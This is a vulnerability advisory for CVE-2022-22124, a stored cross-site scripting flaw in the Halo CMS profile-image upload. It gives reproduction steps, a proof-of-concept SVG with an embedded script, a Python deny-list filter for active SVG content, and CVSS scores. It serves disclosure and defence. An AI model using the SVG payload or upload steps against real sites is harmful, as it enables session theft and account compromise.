
CVE-2022-22124
Date: January 13, 2022
Overview
In Halo, versions v1.0.0 to v1.4.17 (latest) are vulnerable to Stored Cross-Site Scripting (XSS) in the profile image. An authenticated attacker can upload a carefully crafted SVG file that will trigger arbitrary JavaScript to run in a victim’s browser.
Details
Halo is a modern open-source blogging and content management system. Affected versions of Halo are vulnerable to stored XSS via the profile image upload mechanism, which allows the uploading of malicious SVG files.
PoC Details
Log in to the application.
Enter the profile section, and press on the profile picture in order to change it.
Click on “upload an attachment”.
Choose a malicious SVG file with a payload such as the one given below, and upload it.
Click “deposit” in order to save. The malicious SVG will be saved under “/upload/”.
Once opened, it will trigger an alert.
PoC Code
// Malicious SVG file contents:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="500" height="500" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("POC");
</script>
</svg>
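One way to screen uploads for the active content this PoC relies on, as an added example (not Halo's code and not part of the original advisory). It is written in Python for illustration; the function name `svg_findings` and the deny-list are assumptions.

```python
import xml.parsers.expat as expat

# Elements that can run script or embed foreign markup (compared lower-cased).
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}

def svg_findings(data: bytes) -> list:
    """Return reasons to reject an uploaded SVG; an empty list means none found."""
    findings = []

    def local(name):
        # With namespace_separator=" ", expat reports names as "uri local".
        return name.rsplit(" ", 1)[-1].lower()

    def on_start(name, attrs):
        if local(name) in ACTIVE_ELEMENTS:
            findings.append("element <%s>" % local(name))
        for attr, value in attrs.items():
            # Drop whitespace/control characters before checking the URL scheme.
            compact = "".join(ch for ch in value if ch > " ").lower()
            if local(attr).startswith("on"):
                findings.append("event handler attribute %s" % local(attr))
            elif local(attr) == "href" and compact.startswith("javascript:"):
                findings.append("javascript: URL in %s" % local(attr))

    def on_entity_decl(*_args):
        # A profile image needs no entity declarations; treat them as a reject reason.
        findings.append("entity declaration in DTD")

    parser = expat.ParserCreate(namespace_separator=" ")
    parser.StartElementHandler = on_start
    parser.EntityDeclHandler = on_entity_decl
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        findings.append("not well-formed XML: %s" % exc)
    return findings

# Constructed samples: the first repeats the PoC from this page, the second is benign.
POC_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="500" height="500" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("POC");
</script>
</svg>"""
BENIGN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="5" height="5"/></svg>'

if __name__ == "__main__":
    for sample in (POC_SVG, BENIGN_SVG):
        print(svg_findings(sample))
```

A deny-list check like this is one layer only; serving uploaded files with `Content-Disposition: attachment` or a `Content-Security-Policy` that disables scripts stops a stored SVG from executing when it is opened directly.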
Affected Environments
Halo versions v1.0.0 through v1.4.17 (latest)
Prevention
No fix is provided
Language: Java
Good to know:

| Base Score: | |
|---|---|
| Attack Vector (AV): | Network |
| Attack Complexity (AC): | Low |
| Privileges Required (PR): | Low |
| User Interaction (UI): | Required |
| Scope (S): | Changed |
| Confidentiality (C): | Low |
| Integrity (I): | Low |
| Availability (A): | None |

| Base Score: | |
|---|---|
| Access Vector (AV): | Network |
| Access Complexity (AC): | Medium |
| Authentication (AU): | Single |
| Confidentiality (C): | None |
| Integrity (I): | Partial |
| Availability (A): | None |